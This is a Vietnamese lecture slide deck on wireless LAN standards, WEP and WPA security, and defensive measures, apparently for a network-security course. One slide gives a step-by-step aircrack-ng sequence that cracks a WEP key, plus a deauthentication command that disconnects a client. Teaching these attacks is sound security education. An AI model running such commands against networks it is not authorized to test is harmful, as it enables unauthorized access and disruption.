Mạng không dây và Bảo mật

Nội dung

Giới thiệu mạng không dây

802.11 Wireless LAN

Bảo mật trong Wireless LAN

WEP và bẻ khóa WEP

Giới thiệu WPA và WPA-PSK TKIP

Giải pháp bảo mật Wireless LAN

Giới thiệu Mạng không dây

Mạng không dây và chuẩn 802.11

Một số chuẩn không dây 802.11

Chuẩn Tần số Tốc độ Ghi chú

802.11a ~ 5 GHz ≤ 54 Mbps Không tương thích với hai

chuẩn b và g

802.11b ~ 2.4 GHz ≤ 11 Mbps Tương thích chuẩn g

802.11g ~ 2.4 GHz ≤ 54 Mbps Tương thích chuẩn b

802.11n ≥ 250 Mbps Hỗ trợ MIMO (MultiIn,MultiOut)

802.11e Phân mức độ ưu tiên lưu thông: dữ liệu cần thời gian

thực (tín hiệu hình, gọi VoIP) truyền trước dữ liệu kém

quan trọng hơn (mail, web)

802.11i Tăng bảo mật: thêm mã hóa và điều khiển truy cập

WiMAX(Worldwide Interoperability for Microwave Access)

WiMAX, chuẩn 802.16, tương tự Wi-Fi (802.11a, b, g) về khái niệm nhưng có cải tiến nâng cao hiệu suất và kết nối xa hơn

Tốc độ truyền dữ liệu 75 Mbps

Tầm phủ sóng 2 → 10 km

Là công nghệ không dây băng thông rộng đang được thử nghiệm

Ưu điểm của Wireless LAN

Khả năng mở rộng quản lý cao

tránh được tình trạng khó đi dây

Tính linh động

sử dụng mạng mọi nơi

Hỗ trợ nhiều loại thiết bị cầm tay

Tiết kiệm chi phí thiết lập các đường mạng

trong tòa nhà và chi phí bảo dưỡng

Nhược điểm của Wireless LAN

Phức tạp trong thiết lập, quản lý và vận

hành mạng

Thông tin truyền trên không trung với tần

số dùng chung, gây nhiễu và bảo mật

Tốc độ chưa so sánh được với Wired

LAN

Giá thành

802.11 Wireless LAN

Thông số định hình một Wireless LAN

Chuẩn mạng không dây

802.11 a / b / g / e / n / i

Kênh truyền (channel)

Mỹ: 11 kênh; Châu Âu: 13 kênh; Nhật: 14 kênh

SSID (Service Set Identifier)

Tên của Wireless LAN

Các thành phần trong Wireless LAN

Card mạng không dây

PCI, USB, PCMCIA

Access Point

Router không dây

Chế độ làm việc của Access Point

Chế độ gốc (AP root mode)

Chế độ client (Client mode)

Infrastructure

Ad-hoc

Chế độ cầu nối (Bridge mode)

Chế độ lặp (Repeater mode)

AP root mode

AP client

Repeater

Bridge

Outdoor wireless

- Mô hình mạng không dây ngoài trời(tt)- Hoạt động ở băng tầng 2.4Ghz, 5,8 Ghz và kết hợp với

nhiều dạng antenna: parabol, yagi, Pannel, Omni để mở rộng khoảng cách và hướng sóng

- Tốc độ 54Mbps hay 11Mbps- Triển khai ở những vị trí không thể đi dây như cảng,

trường học, khu vui chơi hay nhà xưởng.Ứng dụng:- Kết nối giữa các Building với nhau, trung tâm và chi

nhánh văn phòng.- Kết nối mạng ở những khu vực sân bãi: trường học,

cảng, sân bay.- Dùng là điểm truy cập internet(HostPot)

Outdoor wireless

Antenna

AP outdoor Antenna

Bảo mật trong Wireless LAN

Định hình Wireless LAN

Secu

rity

Th

reat

Bắt dữ liệu trong Wireless LAN không bảo mật

Secu

rity

Th

reat

Chứng thực trong chế độ không bảo mật

Các chế độ bảo mật

WEP

WPAEnterprise

Personal (WPA-PSK)

WPA2

Chứng thực khóa chia sẻ (Shared Key)

Bảo mật với WEP (Wired Equivalent Privacy)

Secu

rity

Th

reat

Bẻ khóa WEP với aircrack

airmon-ng start rausb0 11

airodump-ng –c 11 –w out rausb0

aireplay-ng -1 0 –e 802.11g-AP –a 00:12:0e:36:6e:43

–h 11:22:33:44:55:66 rausb0

aireplay-ng -3 -b 00:12:0e:36:6e:43

–h 11:22:33:44:55:66 –x 600 rausb0

aircrack-ng –n 64 out.cap

Tắt kết nối với card chipset RT2500

aireplay-ng –0 0

–a 00:12:0e:36:6e:43

–c 00:15:e9:af:44:3f rausb0

Bảo mật với WPA-PSK TKIP(WiFi Protected Access – PreShared Key

Temporal Key Integrity Protocol)

Sử dụng per-packet key

Tăng khoảng-sử-dụng của IV từ 24 bits

thành 48 bits

Cải tiến CRC bằng Message Integrity

Code (MIC) key

Secu

rity

Th

reat

Giải pháp bảo mật Wireless LAN

Thay đổi thông số mặc định

SSID (Service Set Identifier)

Kênh truyền (channel)

Mật khẩu cho phép cấu hình AP

Lọc (Filtering)

Lọc SSID

Không sử dụng SSID mặc định hay có liên

quan đến tổ chức

Không quảng bá SSID

Lọc địa chỉ MAC

Lọc giao thức

Bảo mật với WEP và WPA / WPA2

Sử dụng công cụ và thiết bị bảo mật

Thực hiện bảo mật định kỳ

Bảo vệ mạng ở mức vật lý

Tài liệu tham khảo

Lee Barken, How Secure Is Your Wireless Network? Safeguarding Your Wi-Fi LAN – Chapter 3 4 5, 2003, Prentice Hall PTR, ISBN: 0-13-140206-4

International Council of Electronic Commerce Consultants, Ethical Hacking (EC-Council Exam 312-50): Student Courseware – Module 15, 2004, OSB, ISBN: 0972936211

Matthew Gast, 802.11 Wireless Networks The Definitive Guide, 2005, O'Reilly

Micheal Sutton, Hacking the Invisible Network, 2002 iDEFENSE Labs, http://www.idefense.com

Daniel V. Hoffman, Essential Wireless Hacking Tools